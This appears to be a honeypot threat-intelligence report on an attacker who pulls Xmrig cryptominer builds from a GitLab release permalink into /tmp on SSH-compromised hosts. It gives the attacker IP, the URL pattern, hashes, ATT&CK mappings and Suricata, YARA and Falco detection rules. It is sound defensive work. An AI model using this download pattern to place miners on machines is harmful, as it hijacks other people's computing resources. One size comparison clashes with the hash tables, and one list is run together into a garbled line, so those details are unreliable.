Published 2026-06-24 · Source: distributed honeypot fleet · Confidence: HIGH
Over a 30-day window, sensors observed an attacker using GitLab's release CDN as a malware
distribution channel for Xmrig cryptominer binaries. The attacker (34.67.58.31,
a cloud-hosting provider IP) downloads multi-arch Xmrig static builds from
gitlab.com/Kanedias/xmrig-static — a public GitLab repository that maintains
pre-compiled Xmrig binaries. By using the /permalink/latest/ URL path, the attacker
always receives the newest build without hardcoding version numbers or maintaining their own
distribution infrastructure.
This pattern represents an emerging class of supply-chain-adjacent threats where attackers
weaponize legitimate software distribution platforms. Traditional IP blocklists and domain
blocklists cannot block gitlab.com without disrupting legitimate development
workflows. The binaries are authentic Xmrig builds — not modified malware — which means
signature-based detection must rely on behavioral indicators rather than file hashes.
| Attribute | Assessment |
|---|---|
| Attacker IP | 34.67.58.31 — cloud-hosting provider |
| Distribution channel | GitLab Releases CDN (gitlab.com) |
| Repository | Kanedias/xmrig-static — public Xmrig static-builds repo |
| URL pattern | /permalink/latest/downloads/xmrig-<arch>-static |
| Intent | Cryptomining (Xmrig deployment via SSH access) |
| Sophistication | Medium — leverages legitimate infrastructure to evade blocklists |
| Cadence | Weekly, ~09:40 UTC (3 waves: Jun 10, Jun 17, Jun 24) |
| First observed | 2026-06-10 |
| Last observed | 2026-06-24 (active) |
┌──────────────────────────────────────────────────────────────────┐
│ GitLab CDN as malware distribution channel │
└──────────────────────────────────────────────────────────────────┘
Attacker 34.67.58.31 (cloud-hosting)
│
│ SSH into target → execute download command
│
▼
gitlab.com/Kanedias/xmrig-static/-/releases/permalink/latest/downloads/
│
├── xmrig-x86_64-static (9.8 MB) → /tmp/xmrig
├── xmrig-i686-static (10.9 MB) → /tmp/xmrig
├── xmrig-aarch64-static (8.8 MB) → /tmp/xmrig
└── xmrig-armv7-static (6.1 MB) → /tmp/xmrig
Why this matters:
• gitlab.com cannot be blocklisted without impacting development workflows
• /permalink/latest/ → always gets newest build, no version pinning
• Binaries are authentic Xmrig — not modified — so hash-based detection rotates weekly
• Cloud-hosting source IP suggests scheduled automation (weekly cron)
| SHA256 | Architecture | Size | URL |
|---|---|---|---|
dceaabef812f5600... | ELF 64-bit x86-64 | 9,832,024 B | xmrig-x86_64-static |
8a4c02ac5b951196... | ELF 32-bit i386 | 10,944,948 B | xmrig-i686-static |
4868c7dce2245d3a... | ELF 64-bit AArch64 | 8,836,112 B | xmrig-aarch64-static |
3d9ae2e3cadbba2b... | ELF 32-bit ARMv7 | 6,086,388 B | xmrig-armv7-static |
| SHA256 | Architecture | Size |
|---|---|---|
1a0b0bb859fe6686... | ELF 64-bit x86-64 | 9,832,024 B |
45ab548ec8a93f49... | ELF 32-bit i386 | 10,944,948 B |
1eb849549df06ff4... | ELF 64-bit AArch64 | 8,836,112 B |
ca90747aec191150... | ELF 32-bit ARMv7 | 6,086,388 B |
| SHA256 | Architecture | Size |
|---|---|---|
c3cedc9a4d761e9a... | ELF 64-bit x86-64 | 9,832,024 B |
4e261d31521afdc0... | ELF 32-bit i386 | 10,940,852 B |
69b36a4cd1a95119... | ELF 64-bit AArch64 | 8,836,112 B |
60847567bce85f20... | ELF 32-bit ARMv7 | 6,086,388 B |
Note: Binary sizes are identical across waves 2 and 3 (except i386 in wave 1:
10,940,852 vs 10,944,948 — a 4 KB difference indicating a build-system change between releases).
SHA256 hashes differ across waves because the repository publishes new builds weekly, and the
/permalink/latest/ URL resolves to the newest release.
The most recent wave (2026-06-24) has not yet been submitted to VirusTotal. An earlier wave
sample (ca90747a...) was fetched on 2026-06-23 but returned no VT results —
consistent with these being legitimate, unmodified Xmrig static builds rather than custom-compiled
malware. Xmrig is open-source miner software with both legitimate and malicious use cases; AV
engines typically do not flag unmodified builds.
The threat is not in the binary itself (Xmrig is well-documented) but in the distribution method. Using GitLab's release CDN provides several advantages to the attacker:
gitlab.com cannot be blocked without impacting legitimate development/permalink/latest/ always fetches the newest build without code changes| ID | Technique | Evidence |
|---|---|---|
| T1496 | Resource Hijacking | Xmrig cryptominer deployment for Monero mining |
| T1105 | Ingress Tool Transfer | Downloads from gitlab.com Releases CDN |
| T1071.001 | Web Protocols | HTTPS downloads from GitLab (port 443) |
| T1584.006 | Compromise Infrastructure: Web Services | Abuse of legitimate GitLab release pipeline as distribution channel |
| T1106 | Native API | Xmrig uses native CPU instructions for mining (AES-NI, AVX2) |
| Date | Event |
|---|---|
| 2026-06-10 ~09:36 UTC | Wave 1: 4 multi-arch samples downloaded from GitLab. First observation of this campaign. |
| 2026-06-17 ~09:40 UTC | Wave 2: 4 samples with updated hashes (new weekly build published). Identical sizes. |
| 2026-06-24 ~09:43 UTC | Wave 3: 4 samples with updated hashes again. Campaign continues weekly cadence. |
The ~09:40 UTC timing across all three waves suggests a scheduled task (cron) on the attacker's system. The consistent 7-day interval (Jun 10 → 17 → 24) confirms weekly automation.
alert tls $HOME_NET any -> $EXTERNAL_NET 443 ( msg:"cowrAI GitLab CDN Xmrig static-build download"; flow:to_server,established; tls.sni; content:"gitlab.com"; http.uri; content:"Kanedias/xmrig-static"; content:"permalink/latest"; distance:0; content:"xmrig-"; distance:0; content:"-static"; distance:0; classtype:trojan-activity; sid:9003030001; rev:1; )
rule Xmrig_Static_Build_From_GitLab {
meta:
description = "Xmrig static build distributed via GitLab CDN"
author = "cowrAI"
date = "2026-06-24"
strings:
$xmrig1 = "xmrig" ascii nocase
$xmrig2 = "Donate to support the project" ascii
$xmrig3 = "RANDOMX" ascii
$build1 = "Kanedias/xmrig-static" ascii
condition:
($xmrig1 and $xmrig2 and $xmrig3) or $build1
}
- rule: Xmrig Process Running
desc: Detect xmrig process from GitLab CDN distribution
condition: proc.name in (xmrig, xmrigMiner, .real_mnd) or \
proc.cmdline contains "xmrig" or \
proc.cmdline contains "-c /tmp/xc"
output: "Xmrig miner detected (pid=%proc.pid name=%proc.name cmdline=%proc.cmdline)"
priority: WARNING
Data collected by a distributed honeypot fleet running SSH protocol lures. Post-authentication commands were captured at the application layer, including the URLs used to download malware binaries. Downloaded files were automatically hashed and archived for analysis. The GitLab distribution pattern was identified by correlating download URLs across multiple sensors and confirming the weekly cadence.